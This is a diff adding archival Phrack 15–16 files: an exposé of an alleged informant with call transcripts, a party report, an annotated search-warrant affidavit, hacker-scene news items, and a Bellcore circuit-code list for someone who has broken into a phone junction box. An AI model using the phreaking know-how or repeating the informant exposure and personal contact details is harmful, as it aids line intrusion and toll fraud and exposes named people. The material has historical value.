+when he realizes he screwed up, he tries to insult LORD REBEL's abilities.-KL]
+------------------------------------------------------------------------------
+Noah:  Who else is part of LOD that I missed?
+Mark:  I don't know who you would have heard of.
+Noah:  I've pretty much heard of everyone, I just can't think of anyone else.
+
+[Yeah Noah, you are a regular best friend with everyone in LOD.-KL]
+------------------------------------------------------------------------------
+Noah:  Want to give out LORD REBEL's number?
+Mark:  Everybody knows it already.
+Noah:  What is it?
+Mark:  Which one?
+Noah:  Both, all.
+Mark:  Want do you want to know for, don't you have it?
+Noah:  Never bothered getting them.  What do you got? Mark!
+Mark:  Yeah.
+Noah:  Do you have his number?
+Mark:  Yeah.
+Noah:  Well, what is it!?
+Mark:  Why should I say?
+Noah:  I dunno, you say everyone's got it.
+Mark:  Yeah, so.
+Noah:  So if everyone has it, you might as well give it to everybody.
+Mark:  Not really, I wouldn't want to be the one to tell him that I gave out
+       his number.
+Noah:  Ok Mark, fine, it's no problem for me to get anyone's number.  I got
+       VIDEOSMITH's and SILVER SPY's, no problem.  [Yeah right, see the other
+       conversation with John Maxfield.-KL]
+------------------------------------------------------------------------------
+Noah:  CATCH-22 is supposed to be the most elite BBS in the United States.
+       What do you think about that Mark?
+Mark:  What?
+Noah:  What do you think about that Mark?
+Mark:  About what?
+Noah:  About CATCH-22.
+Mark:  What about it?
+Noah:  (pause) Well.
+Mark:  Its not the greatest board because it's not really that active.
+Noah:  Right, but what do you think about it?  Alright, first off here, first
+       off, first off, do you have KARL MARX's number?
+Mark:  What?
+Noah:  I doubt you have KARL MARX's phone number.
+Mark:  Ask me if I really care.
+Noah:  I'm just wondering if YOU DO.
+Mark:  It's one thing to have all these people's numbers, it's another if you
+       are welcome to call them.
+Noah:  Yeah (pause), well are you?
+Mark:  Why should I say?
+Noah:  I dunno, I dunno.  I'm probably going to ask him anyways.
+
+       [I don't think my ragging is even necessary in this excerpt.-KL]
+------------------------------------------------------------------------------
+Noah:  Here is what MAXFIELD says, "You got the hackers, and then you got the
+       people who want to make money off the hackers."  Information shouldn't
+       be free, you should find out things on your own.
+
+    [Give me a break Noah, you are the BIGGEST leach I have ever seen -KL]
+------------------------------------------------------------------------------
+One final note to make about the Alliance conversations is that halfway
+through, IL DUCE and DAN THE OPERATOR gave out BILL FROM RNOC's full name,
+phone number, address, etc.
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+Part Two: Noah Engineers John Maxfield
+
+ The list of topics discussed in this conversation is much longer;
+
+      Arthur Dent / Ben Casey / Big Brother / Bill From RNOC / BoardScan
+Captain Crunch / Celtic Phrost / Cheshire Catalyst / Doc Holiday / Easywriter
+    Genghis Khan / Jenny Jaguar / Jester Sluggo / Karl Marx / Kerrang Khan
+ Kloey Detect / Max Files / Noah Espert / Legion Of Doom / Legion of Hackers
+   Lord Digital / Lord Rebel / Mark Tabas / Oryan QUEST / Phucked Agent 04
+Phrack Inc. / Pirate's Hangout / Septic Tank / Sigmund Fraud / The Disk Jockey
+       The Executioner / The Federation / The *414* Wizard / The Hobbit
+  The Marauder The Safecracker / The Telecom Security Group / The Videosmith
+       The Weasel / Tommy Hawk / Torture Chamber / Twilight Zone / Tuc
+                          Violet Boregard / Zepplin
+
+
+The following are the highlights of the conversation between DAN THE OPERATOR
+and JOHN MAXFIELD.                                      [John Maxfield = John]
+------------------------------------------------------------------------------
+Noah:  Did you ever find VIDEOSMITH's number?
+John:  No, matter of fact.  You know what it is, I've been on boards he's been
+       on in the 215 NPA [possibly Atlantis], but well.
+Noah:  But you don't have his number?
+John:  Should I?
+Noah:  He's fairly big, he knows his stuff.  I would think he'd be worth
+       getting a number for.
+John:  Doesn't do anything for me because you know, just having his number
+       doesn't get him in trouble or anything.
+Noah:  Oh, well I don't want him to get in trouble...he's a nice person.  So
+       do you have LORD REBEL's phone number?
+John:  What do you know about him?
+Noah:  I think he's up in New York.
+John:  914?
+Noah:  Possibly 718, 212, possibly even 201. [Excuse me you dork.  The 201 NPA
+       is in the state of New Jersey not New York.  What a loser Noah is. -KL]
+John:  If you don't have a number on him I'll have to do an alphabetical
+       search for him.  It takes a while.
+Noah:  Well we could talk while it's going.  I think you're pretty
+       interesting, you're not boring like I am.
+John:  Well you're not boring to me as long as I keep getting people's phone
+       numbers.  Bahahahahahahahahah Har har har.
+Noah:  (Pause)(Pause)(Pause) Bahahahahahahaha.  Sheesh.
+John:  Well let's see what it finds, there's a lot of Lords in there.
+Noah:  He's part of LOD.
+John:  Oh he's part of LOD!?
+Noah:  Yeah.
+John:  Well I might have him and I might not [What a profound statement -KL].
+Noah:  He's not very active in LOD.
+
+         [The search for LORD REBEL's information was a failure -KL]
+------------------------------------------------------------------------------
+Noah:  I got a question, I'm still trying to figure this out.  Are there
+       people like me who just call you up like this?
+John:  Yes there are.
+Noah:  A lot?
+John:  Enough.  You know it's funny, there's people that call up and there
+       assholes and I'll just hang up on them.  There is other people that
+       call up and well you know they try to feed me bullshit, but at least
+       they aren't being jerks about it.
+Noah:  You think I'm feeding you bullshit?
+John:  I dunno, maybe you are or maybe you aren't.  What I'm saying is that
+       there are people that behave like humans.  So there are a few that call
+       in.
+
+       You know when you're working with informants, you got different
+       categories.  You got informants you can trust and you got informants
+       that well hold on a second.  There are some informants, that they could
+       tell me anything and I'd believe them.  Ok, because I know them.  Met
+       them personally maybe or known the guy for 3 or 4 years, his
+       information is always correct that sort of thing.
+
+       Then there is somebody like you that umm is kinda maybe a "Class 2
+       Informant."  Gives valid phone numbers and information out, but is not
+       really a true informant.  Then there is a "Class 3 Informant" that's
+       like, ahh somebody like ORYAN QUEST who calls up and turns in somebody
+       he doesn't like, but that's all he ever does.  I don't know if you can
+       call them Class 1, Class 2, Class 3 exactly but that's how I look at
+       it.
+
+   [Shortly after this, Maxfield gave out JESTER SLUGGO's information -KL]
+------------------------------------------------------------------------------
+Noah:  How about Phucked Agent 04?
+John:  Oh him, his name is XXXXX and he's out in XXXXXXX.
+Noah:  Something like that.
+John:  He's one of the jerks that made death threats against me.  I kinda
+       would like to get him.
+Noah:  You want his number?
+John:  Yeah.
+Noah:  Lemme see if I can catch up with him, I know a few people in LOD.
+------------------------------------------------------------------------------
+[Noah tried to get information on KERRANG KHAN for a while and then started
+asking about KARL MARX -KL]
+
+Noah:  Ok, KARL MARX.
+John:  Oh, he got busted along with MARK TABAS you know, I told you all about
+       that.
+Noah:  Yeah yeah.
+John:  He lives out in NPA XXX, but he was going to college in XXXXXXXXXX and
+       I don't have a number for him there.
+Noah:  He's probably back home now.
+John:  Yeah, but I probably shouldn't give out his number.  He did get popped.
+Noah:  Aw come on.
+John:  Nah.
+Noah:  Come on.
+John:  Nah.
+Noah:  Please.
+John:  Nah. I probably don't have a correct number anyway.
+Noah:  Dude.  Well if you don't have a correct number then give me the old
+       number.
+John:  Nah.
+Noah:  C'mon dude.
+John:  Nah.
+Noah:  Dude!
+John:  Nah nah.  Besides I have a feeling that he wouldn't appreciate being
+       called up by hackers anyway.
+Noah:  He's still around though!
+John:  Is he!?
+Noah:  Yes.
+John:  Oh really.
+Noah:  Yes sir.  Because he was talking with THE MARAUDER, you know, Todd.
+John:  Yeah?
+Noah:  Yeah.
+John:  That's interesting.
+
+[They went on to discuss THE SAFECRAKER, THE SEPTIC TANK, THE TWILIGHT ZONE,
+TORTURE CHAMBER, and THE FEDERATION.  Maxfield reveled that he had been on
+TWILIGHT ZONE back when THE MARAUDER used to run it.  -KL]
+------------------------------------------------------------------------------
+Noah:  THE MARAUDER is still home, he didn't go to college.
+John:  Yeah, MARAUDER, now he is heavy duty.
+Noah:  Yeah, he knows his snit (not a typo).  However, he doesn't brag about
+       it.
+John:  Well the thing is, you know is what the hell is he trying to
+       accomplish? I sometimes kinda wonder what motivates somebody like that.
+Noah:  What do you mean?
+John:  Well he wants to screw around with all this stuff, but what's the
+       point?
+------------------------------------------------------------------------------
+SIGMUND FRAUD, MAX FILES, TOMMY HAWK, TUC, PHRACK INC., MARK TABAS, were next
+to be discussed.  After which MAXFIELD went on to retell a story about a
+district attorney in California that referred to him as a legend in his own
+time.  Noah then started asking about CAPTAIN CRUNCH and Easywriter, and
+Maxfield told him the story of CAPTAIN CRUNCH's latest bust.
+------------------------------------------------------------------------------
+THE DISK JOCKEY, DOC HOLIDAY, THE MARAUDER, BIG BROTHER, ARTHUR DENT, THE
+WEASEL, BILL FROM RNOC, THE 414 WIZARD, THE EXECUTIONER, and LORD DIGITAL were
+next.
+
+Then it was Noah's turn to unload (although Noah had already given out
+information on many of the previously mentioned people).
+
+TUC, THE TELECOM SECURITY GROUP, CELTIC PHROST, ZEPPLIN, and GENGHIS KHAN had
+their information handed out freely.
+
+John:  I guess I'm going to have the goons come over and pay you a visit.
+Noah:  Who me?
+John:  Take your computer, clean your room for you.
+Noah:  No, no, please... don't... you can't do that.  I'll be an informant
+       dammit.  I'll give you all my files, I'll send them immediately...
+       Federal Express.
+John:  Sounds good.
+Noah:  Has anyone ever really done that?
+John:  Well not by Federal Express.
+Noah:  I'll send you all my manuals, everything.  I'll even tell you my
+       favorite Sprint code.
+John:  Sprint would appreciate that.  You know, it's interesting that you know
+       MARAUDER.
+Noah:  Todd and I, yeah, well we're on a first name basis.  [Yeah you know his
+       first name but that's as far as it goes, isn't it Noah. -KL]
+------------------------------------------------------------------------------
+Noah gave out more people's information and the conversation ran on for
+another 20 minutes.  The problem is that this is when the tape ran out, but
+the conversation was going strong.  Noah was giving out numbers alphabetically
+and he was still in the C-G area when the tape ran out.  There is no telling
+as to what was discussed next.
+
+All of the people mentioned at the beginning were discussed in depth and the
+excerpts shown here do not necessarily show the extent of the discussion.  I
+didn't transcript the entire conversation because in doing so would publicly
+release information that would be unproductive to our society.
+
+So, many of you are probably still asking yourself, where did we get the FBI
+connection from?  Well, some time ago, DAN THE OPERATOR used to hang out with
+THE TRADER and they were into some kind of stock fraud using Bank Americard or
+something along those lines.  Something went wrong and Noah was visited by the
+FBI.  As it turns out, Noah became their informant and they dropped the
+charges.
+
+Sometime later, Noah tried to set up TERMINUS (see the current Phrack
+Pro-Phile) to meet (unknowingly) with the FBI and give them a tour of his
+board,  TERMINUS realized what was going on and Noah's plans were ruined.
+
+I hope you learned from this story, don't let yourself be maneuvered by people
+like Noah.  There are more informants out there than you think.
+
+                         Written by Knight Lightning
+
+For more information about DAN THE OPERATOR, you should read THE SYNDICATE
+REPORTS Transmittal No. 13 by THE SENSEI.  Available on finer BBSes/AEs
+everywhere.
+______________________________________________________________________________
+
diff --git a/phrack15/7.txt b/phrack15/7.txt
new file mode 100644
index 0000000..2f7af51
--- /dev/null
+++ b/phrack15/7.txt
@@ -0,0 +1,45 @@
+PartyCon '87                                                  July 24-26, 1987
+~~~~~~~~~~~~
+This article is not meant to be as in depth as the SummerCon issue, but I
+think you'll enjoy it.
+
+Before we begin, here is a list of the total phreak/hack attendees;
+
+      Cheap Shades / Control C / Forest Ranger / Knight Lightning / Loki
+     Lucifer 666 / Mad Hatter / Sir William / Synthetic Slug / Taran King
+               The Cutthroat / The Disk Jockey / The Mad Hacker
+
+Other people who attended that should be made a note of include; Dan and Jeff
+(Two of Control C's roommates that were pretty cool), Dennis (The Menace); one
+of Control C's neighbors, Connie; The Mad Hacker's girlfriend (at the time
+anyway), and the United States Secret Service; they weren't actually at
+PartyCon, but they kept a close watch from a distance.
+
+For me, it started Friday morning when Cheap Shades and I met Forest Ranger
+and Taran King at Taran's house.  Our trip took us through Illinois, and we
+stopped off at a Burger King in Normal, Illinois (close to Illinois State
+University). Would you believe that the majority of the population there had
+no teeth?
+
+Anyway, our next stop was to see Lucifer 666 in his small one-horse town.  He
+would follow us later (with Synthetic Slug).  We arrived at Control C's
+apartment around 4 PM and found Mad Hatter alone.  The first thing he made a
+note of was some sheets of paper he discovered (while searching ^C's
+apartment).  I won't go into what was on the paper.  Although we didn't know
+it at the time, he copied the papers and hid them in his bag.  It is believed
+that he intended to plant this and other information inside the apartment so
+that ^C would get busted.
+
+Basically, it was a major party with a few mishaps like Forest Ranger and
+Cheap Shades driving into Grand Rapids, Michigan on Friday night and not
+getting back till 4 AM Saturday.  We hit Lake Shore Drive, the beach, a few
+shopping malls, Chicago's Hard Rock Cafe, and Rush Street.  It was a lot of
+fun and we may do it again sometime soon.
+
+If you missed PartyCon '87, you missed out.  For those who wanted to go, but
+couldn't find us, we're sorry.  Hotel cancellations and loss of phone lists
+due to current problems made it impossible for us to contact everyone.
+
+                         Written by Knight Lightning
+______________________________________________________________________________
+
diff --git a/phrack15/8.txt b/phrack15/8.txt
new file mode 100644
index 0000000..c2b53fb
--- /dev/null
+++ b/phrack15/8.txt
@@ -0,0 +1,137 @@
+                      #### PHRACK PRESENTS ISSUE 15 ####
+
+                   ^*^*^*^Phrack World News, Part 1^*^*^*^
+
+                            **** File 8 of 10 ****
+
+
+
+SEARCH WARRANT ON WRITTEN AFFIDAVIT
+
+DATE:  7/17/87
+
+TO:  Special Agent Lewis F. Jackson II, U.S. Secret Service or any agent d use
+     of access devices, and Title 18 USC 1030 - Computer related fraud.
+
+WHEN:  On or before (10 days) at any time day or night
+
+------------
+
+AFFIDAVIT
+
+   "I, Lewis F. Jackson II, first being duly sworn, do depose and state:..."
+
+[Here he goes on and on about his position in the San Jose Secret Service,
+classes he has taken (none of them having to do with computers)]
+
+   "Other individuals involved in the investigation:
+
+    Detective J. McMullen -  Stanford Public Safety/Specialist in computers
+    Steve Daugherty       -  Pacific Bell Telephone (sic)/ Specialist in fraud
+    Stephen Hansen        -  Stanford Electrical Eng./ Director
+    Brian Bales           -  Sprint Telecom./ Security Investigator
+    M. Locker             -  ITT Communications/ Security Investigator
+    Jerry Slaughter       -  MCI Communications/Security Investigator
+
+4.  On 11/14/86, I met with Detective Sgt. John McMullen, who related the
+following:
+
+      a.  Beginning on or about 9/1/86, an unknown suspect or group of
+suspects using the code name Pink Floyd repeatedly accessed the Unix and
+Portia computer systems at Stanford University without authorization.
+
+      b.  The suspects initially managed to decode the password of a computer
+user called "Laurent" and used the account without the permission or knowledge
+of the account holder.  The true account holder was given a new account
+and a program was set up to print out all activity on the "Laurent" account.
+
+       c & d.  Mentions the systems that were accessed illegally, the most
+'dangerous' being Arpanet (geeeee).
+
+       e.  Damage was estimated at $10,000 by Director of Stanford Computers.
+
+       g.  On 1/13/87, the suspect(s) resumed regular break-ins to the
+"Laurent" account, however traps and traces were initially unsuccessful in
+identifying the suspect(s) because the suspect(s) dialed into the Stanford
+Computer System via Sprint or MCI lines, which did not have immediate trap and
+trace capabilities.
+
+6.  On 2/19/87 I forwarded the details of my investigation and a request for
+collateral investigation to the New York Field Office of The U.S. Secret
+Service.  (The USSS [I could say something dumb about USSR here]).  SA Walter
+Burns was assigned the investigation.
+
+7.  SA Burns reported telephonically that comparison of the times at which
+Stanford suffered break ins [aahhh, poor Stanford] with that of DNR's on
+suspects in New York, Pennsylvania, Massachusetts, Maryland and California
+showed a correlation.
+
+8.  [Some stuff about Oryan QUEST engineering Cosmos numbers].
+
+9.  On 4/2/87, I was telephoned again by Mr. Daugherty who reported that on
+4/1/87, while checking a trouble signal on the above DNR's [on Oryan's lines],
+he overheard a call between the central figure in the New York investigation
+and [Oryan Quest's real name.]  Mr. Daughtery was able to identify and
+distinguish between the three suspects because they addressed each other by
+there first name.  During the conversation,  [Oryan Quest] acknowledged being
+a member of L.O.D. (Legion Of Doom), a very private and exclusive group of
+computer hackers.  [Oryan QUEST never was a member.]
+
+10.  [Mr. Daughtery continued to listen while QUEST tried to engineer some
+stuff.  Gee what a coincidence that a security investigator was investigating
+a technical problem at the same time a conversation with 2 of the suspects was
+happening, and perhaps he just COULDN'T disconnect and so had to listen in for
+20 minutes or so.  What luck.]
+
+11.  SA Burns reported that the suspects in New York regularly called the
+suspects in California.
+
+14.  From 4/30/87 to 6/15/87 DNR's were on both California suspects and were
+monitored by me.
+
+[The data from the DNR's was 'analyzed' and sent to Sprint, MCI, and ITT to
+check on codes.  Damages claimed by the various LDX's were:
+
+SPRINT   :  Oryan QUEST   : 3 codes for losses totaling $4,694.72
+            Mark Of CA    : 2 codes for losses totaling $1,912.57
+
+ITT      :  Mark Of CA    : 4 codes for losses totaling $639
+
+MCI      :  Mark Of CA    : 1 code for losses totaling $1,813.62
+
+And the winner is....Oryan QUEST at $4,694.72 against Mark with $4,365.19.]
+
+20.  Through my training and investigation I have learned that people who
+break into computers ("hackers") and people who fraudulently obtain
+telecommunications services ("freakers") are a highly sophisticated and close
+knit group.  They routinely communicate with each other directly or through
+electronic bulletin boards.
+
+     [Note:  When a Phrack reporter called Lewis Jackson and asked why after
+his no doubt extensive training he didn't spell "freakers" correctly with a
+'ph' he reacted rather rudely.]
+
+21.
+22. [Jackson's in depth analysis of what hackers have ("Blue Boxes are
+23.     normally made from pocket calculators...") and their behavior]
+24.
+
+26.  Through my training and investigations, I have learned that evidence
+stored in computers, floppy disks, and speed dialers is very fragile and can
+be destroyed in a matter of seconds by several methods including but not
+limited to:  striking one or more keys on the computer keyboard to trigger a
+preset computer program to delete information stored within, passing a strong
+magnetic source in close proximity to a computer, throwing a light switch
+designed to either trigger a preset program or cut power in order to delete
+information stored in a computer or speed dialer or computer; or simply
+delivering a sharp blow to the computer.  [Blunt blows don't cut it.]
+
+27.  Because of the ease with which evidence stored in computers can be
+destroyed or transferred, it is essential that search warrants be executed at
+a time when the suspect is least likely to be physically operating the target
+computer system and least likely to have access to methods of destroying or
+transferring evidence stored within the system.  Because of the rapidity of
+modern communications and the ability to destroy or transfer evidence remotely
+by one computer to another, it is also essential that in cases involving
+multiple suspects, all search warrants must be executed simultaneously.
+
diff --git a/phrack16/1.txt b/phrack16/1.txt
new file mode 100644
index 0000000..6e42cec
--- /dev/null
+++ b/phrack16/1.txt
@@ -0,0 +1,40 @@
+		===== Phrack Magazine presents Phrack 16 =====
+		  ===== File 1 of 12 : Phrack 16 Intro =====
+
+	Greetings, and welcome to Phrack #16, we are a bit late, but bigger
+	then ever. I think you will find this issue very interesting.
+	Enjoy and have Phun
+
+	Elric of Imrryr - Editor
+
+
+Contents this issue:
+
+16.1  Phrack 16 Intro by Elric of Imrryr			2K
+16.2  BELLCORE Information by The Mad Phone-Man		11K
+16.3  A Hacker's Guide to Primos:  Part 1 by Cosmos Kid	11K
+16.4  Hacking GTN by The Kurgan					7K
+16.5  Credit Card Laws Laws by Tom Brokow			7K
+16.6  Tapping Telephone Lines by Agent Steal			9K
+16.7  Reading Trans-Union Credit Reports by The Disk Jockey	6K
+
+Phrack World News:
+
+16.8  The Story Of the West German Hackers by Shooting Shark	3K
+16.9  The Mad Phone-Man and the Gestapo by The Mad Phone-Man	2K
+16.10 Flight of the Mad Phone-Man by The Mad Phone-Man		2K
+16.11 Shadow Hawk Busted Again by Shooting Shark		2K
+16.12 Coin Box Thief Wanted by The $muggler			2K
+
+
+
+Submission to Phrack may be sent to the following BBSes:
+
+Unlimited Reality	313-489-0747 Phrack
+The Free World		301-668-7657 Phrack Inc. (*)
+The Executive Inn	915-581-5145 Phrack
+Lunatic Labs UnLtd.	415-278-7421 Phrack	(*)
+House of the Rising Sun 401-789-1809 Phrack
+
+
+* You will get the quickest reply from these systems.
diff --git a/phrack16/10.txt b/phrack16/10.txt
new file mode 100644
index 0000000..a6c0faf
--- /dev/null
+++ b/phrack16/10.txt
@@ -0,0 +1,40 @@
+		      #### PHRACK PRESENTS ISSUE 16 ####
+		   ^*^*^*^Phrack World News, Part 3^*^*^*^
+			   **** File 10 of 12 ****
+
+
+ [Ed's Note:  Certain names have been change in the article to protect the
+ author]
+
+      The Flight of The Mad Phone-Man's BBS to a Friendly Foreign Country
+
+
+	Using my knowledge that the pigs grab your computer when they bust
+you,I got real worried about  losing a BIG investment I've got in my IBM. I
+decide	there's a  better way.... Move it!  But where? Where's safe  from the
+PhBI?  Well  in the old days, to escape the draft, you went to Canada, why not
+expatriate my board....	Well the  costs of  a line  are very  high, let's see
+what's available elsewhere.
+	One afternoon, I'm working at a local hospital,(one I do telecom work
+for) and I  ask the  comm mgr  if they	have any links to Canada?  He says why
+yes, we have  an inter-medical link over  a 23ghz microwave into the city just
+across the border. I ask to  see the equipment.	WOW!  My dreams  come true,
+it's a D4 bank (Rockwell) and it's only got 4 channel cards in it. Now, being
+a "nice" guy, I offer to  do maintenance  on this equipment if he would let me
+put up another channel...he agrees.  The plot thickens.
+	I've got a satellite office for a business near the hospital on the
+other side, I quickly call up good ole Bell Canada, and have them run a 2 wire
+line from the equipment room to my office. Now the only thing to get is a
+couple of cards to plug into the MUX to put me on the air.
+	A 2 wire E&M card goes for bout $319, and I'd need two.	Ilook around
+the state, and find one bad one in Rochester.... I'm on my way that afternoon
+via motorcycle.	The card  is mine,  and the  only thing I can find wrong is a
+bad  voltage regulator. I stop by  the Rockwell office in  suburban Rochester
+and exchange  the card, while I'm there, I buy a second one (Yeah, on my card)
+and drive home.... by 9pm that night the circuit is up, and we are on the air.
+	Results- Very good line, no noise, can be converted with another card
+for a  modest fee  if I want  the bandwidth.  So that's the  story of how the
+board went to a "friendly foreign country."
+
+
+	 The Mad Phone-Man
diff --git a/phrack16/11.txt b/phrack16/11.txt
new file mode 100644
index 0000000..5640cab
--- /dev/null
+++ b/phrack16/11.txt
@@ -0,0 +1,53 @@
+		      #### PHRACK PRESENTS ISSUE 16 ####
+		   ^*^*^*^Phrack World News, Part 4^*^*^*^
+			   **** File 11 of 12 ****
+
+
+Shadow Hawk Busted Again
+========================
+
+	As many of you know, Shadow Hawk (a/k/a Shadow Hawk 1) had his home
+searched by agents of the FBI, Secret Service, and the Defense Criminal
+Investigative Services and had some of his property confiscated by them on
+September 4th.	We're not going to reprint the Washington Post article as it's
+available through other sources.  Instead, a summary:
+
+	In early July, SH bought an AT&T 3B1 ("Unix PC") with a 67MB drive for
+a dirt-cheap $525.  He got Sys V 3.5 for another $200 but was dissatisfied
+with much of the software they gave him (e.g. they gave him uucp version 1.1).
+
+	When he was tagged by the feds, he had been downloading software (in
+the form of C sources) from various AT&T systems.  According to reports, these
+included the Bell Labs installations at Naperville, Illinois and Murray Hill,
+New Jersey.  Prosecutors said he also gained entry to (and downloaded software
+from) AT&T systems at a NATO installation in Burlington, North Carolina and
+Robins AFB in Georgia.	AT&T claims he stole $1 million worth of software.
+Some of it was unreleased software taken from the Bell Labs systems that was
+given hypothetical price tags by Bell Labs spokespersons.  Agents took his
+3B1, two Atari STs he had in his room, and several diskettes.
+
+	SH is 17 and apparently will be treated as a minor.  At the time of
+this writing, he will either be subject to federal prosecution for 'computer
+theft' or will be subject to prosecution only by the State of Illinois.
+
+	SH's lawyer,  Karen Plant, was quoted as saying that SH "categorically
+denies doing anything that he should not have been doing" and that he "had
+absolutely no sinister motives in terms of stealing property."	As we said, he
+was just collecting software for his new Unix PC.  When I talked to Ms. Plant
+on September 25th, she told me that she had no idea if or when the U.S.
+Attorney would prosecute. Karen Plant can be  reached at (312) 263-1355.  Her
+address is 134 North LaSalle, #306, Chicago, Illinois.
+
+
+---------
+
+On July 9th SH wrote:
+
+	So you see, I'm screwed. Oh yeah, even worse! In my infinite (wisdom
+|| stupidity, take your pick 8-)) I set up a local AT&T owned 7300 to call me
+up and send me their uucp files (my uucp works ok for receive) and guess what.
+I don't think I've to elaborate further on THAT one... (holding my breath, so
+to type)
+				(_>Sh<_
+
+---
diff --git a/phrack16/12.txt b/phrack16/12.txt
new file mode 100644
index 0000000..c7509e1
--- /dev/null
+++ b/phrack16/12.txt
@@ -0,0 +1,40 @@
+		      #### PHRACK PRESENTS ISSUE 16 ####
+		   ^*^*^*^Phrack World News, Part 5^*^*^*^
+			   **** File 12 of 12 ****
+
+
+	 "Phone Companies Across U.S. Want Coins Box Thief's Number"
+		  From the Tribune - Thursday, Nov. 5, 1987
+
+
+ SAN FRANCISCO	-  Seven  telephone  companies	across	the country, including
+   Pacific Bell, are so frazzled  by a coin box thief that they are offering a
+   reward of $25,000 to catch him.
+
+ He's very clever, telephone officials say,  and is the only known suspect  in
+   the country	that is	able to  pick the  locks on  coin boxes  in telephone
+   booths with relative ease.
+
+ He is believed responsible for stealing hundreds of thousands of dollars from
+   coin boxes in the Bay Area and Sacramento this year.
+
+ The  suspect  has  been  identified  by  authorities  as  James Clark, 47, of
+   Pennisula,  Ohio,  a	machinist  and	tool-and-die  maker,  who is believed
+   responsible for coin box thefts in 24 other states.
+
+ Other companies  sharing in  the reward  are Ohio  Bell, Southern Bell, South
+   Carolina Bell,  South Central  Bell, Southwestern  Bell, Bell  Telephone of
+   Pennsylvania and U.S. West.
+
+ Clark	allegedly  hit	pay  phones  that  are	near  freeways and other major
+   thoroughfares.  Clark, described  as	5  feet  9 inches tall, with shoulder
+   length brown hair and gold-rimmed glasses, is reported to be driving a  new
+   Chevrolet Astro van painted a dark metallic blue.
+
+ He was recently in Arizona but is believed to be back in California.
+
+ Written by a Tribune Staff Writer
+
+
+ Typed by the $muggler
+
diff --git a/phrack16/2.txt b/phrack16/2.txt
new file mode 100644
index 0000000..d388c5c
--- /dev/null
+++ b/phrack16/2.txt
@@ -0,0 +1,313 @@
+		===== Phrack Magazine presents Phrack 16 =====
+			   ===== File 2 of 12 =====
+
+--------------------------------------------------------------------
+BELLCORE Information	  by The Mad Phone-man
+--------------------------------------------------------------------
+
+So, you've broken  into the  big phone box on the wall, and are looking at a
+bunch of tags with numbers and letters on them. Which one is the modem line?
+Which one is the 1-800 WATS line?  Which one is the Alarm line? Bell has a
+specific set of codes that enable you to identify what you're looking at.
+These are the same codes the installer gets from the wire center to enable him
+to set	up the line, test it, and make	sure it	matches the  customers order.
+Here are some extracts from the Bellcore book.
+
+First lets take a hypothetical line number I'm familiar with:
+     64FDDV 123456
+-------------------------------------------------------------
+The serial number format:
+
+	Prefix +  service code + modifier +   serial number +
+digits:	1,2	 3,4	   5,6	7,8,9,10,11,12    continued
+-------------------------------------------------------------------------
+
+	 Suffix	+  CO assigning circuit number +   segment
+digits:	13,14,15	    16,17,18,19	      20,21,22
+-------------------------------------------------------------------------
+
+The important shit is in the 3rd thru 6th digit.
+
+SERVICE CODES	Intra or Inter LATA Block 1-26
+-------------
+AA- Packet analog access line
+AB- Packet switch trunk
+AD- Attendant
+AF- Commercial audio fulltime
+AI- Automatic identified outward dialing
+AL- Alternate services
+AM- Packet, off-network access line
+AN- Announcement service
+AO- International/Overseas audio (full time)
+AP- Commercial audio (part time)
+AT- International/Overseas audio (part time)
+AU- Autoscript
+BA- Protective alarm (CD)
+BL- Bell & lights
+BS- Siren control
+CA- SSN Access
+CB- OCC Audio facilities
+CC- OCC Digital facility-medium speed
+CE- SSN Station line
+CF- OCC Special facility
+CG- OCC Telegraph facility
+CH- OCC Digital facility high-speed
+CI- Concentrator Identifier trunk
+CJ- OCC Control facility
+CK- OCC Overseas connecting facility wide-band
+CL- Centrex CO line
+CM- OCC Video facility
+CN- SSN Network trunk
+CO- OCC Overseas connecting facility
+CP- Concentrator identifier signaling link
+CR- OCC Backup facility
+CS- Channel service
+CT- SSN Tie trunk
+CV- OCC Voice grade facility
+CW- OCC Wire pair facility
+CZ- OCC Access facility
+DA- Digital data off-net extension
+DB- HSSDS 1.5 mb/s access line
+DF- HSSDS 1.5 mb/s hub to hub
+DG- HSSDS 1.5 mb/s hub to earth station
+DH- Digital service
+DI- Direct-in dial
+DJ- Digit trunk
+DK- Data link
+DL- Dictation line
+DO- Direct-out dial
+DP- Digital data-2 4 kb/s
+DQ- Digital data-4 8 kb/s
+DR- Digital data-9.6 kb/s
+DW- Digital data-56  kb/s
+DY- Digital service (under 1 mb/s)
+EA- Switched access
+EB- ENFIA II end office trunk
+EC- ENFIA II tandem trunk
+EE- Combined access
+EF- Entrance facility-voice grade
+EG- Type #2 Telegraph
+EL- Emergency reporting line
+EM- Emergency reporting center trunk
+EN- Exchange network access facility
+EP- Entrance facility-program grade
+EQ- Equipment only-(network only) assignment
+ES- Extension service-voice grade
+ET- Entrance facility-telegraph grade
+EU- Extension service-telegraph grade
+EV- Enhanced Emergency reporting trunk
+EW- Off network MTS/WATS equivalent service
+FD- Private line-data
+FG- Group-supergroup spectrum
+FR- Fire dispatch
+FT- Foreign exchange trunk
+FW- Wideband channel
+FV- Voice grade facility
+FX- Foreign exchange
+HP- Non-DDS Digital data 2.4 kb/s
+HQ- Non-DDS Digital data 4.8 kb/s
+HR- Non-DDS Digital data 9.6 kb/s
+HW- Non-DDS Digital data 56  kb/s
+IT- Intertandem tie trunk
+LA- Local area data channel
+LL- Long distance terminal line
+LS- Local service
+LT- Long distance terminal trunk
+MA- Cellular access trunk 2-way
+MT- Wired music
+NA- CSACC link (EPSCS)
+NC- CNCC link (EPSCS)
+ND- Network data line
+OI- Off premises intercommunication station line
+ON- Off network access line
+OP- Off premises extension
+OS- Off premises PBX station line
+PA- Protective alarm (AC)
+PC- Switched digital-access line
+PG- Paging
+PL- Private line-voice
+PM- Protective monitoring
+PR- Protective relaying-voice grade
+PS- MSC constructed spare facility
+PV- Protective relaying-telegraph grade
+PW- Protective relaying-signal grade
+PX- PBX station line
+PZ- MSC constructed circuit
+QU- Packet asynchronous access line
+QS- Packet synchronous access line
+RA- Remote attendant
+RT- Radio landline
+SA- Satellite trunk
+SG- Control/Remote metering signal grade
+SL- Secretarial line
+SM- Sampling
+SN- Special access termination
+SQ- Equipment only-customer premises
+SS- Dataphone select-a-station
+TA- Tandem tie-trunk
+TC- Control/Remote metering-telegraph grade
+TF- Telephoto/Facsimile
+TK- Local PBX trunk
+TL- Non-tandem tie trunk
+TR- Turret or automatic call distributor (ACD) trunk
+TT- Teletypewriter channel
+TU- Turret or automatic call distributor (ACD) line
+TX- Dedicated facility
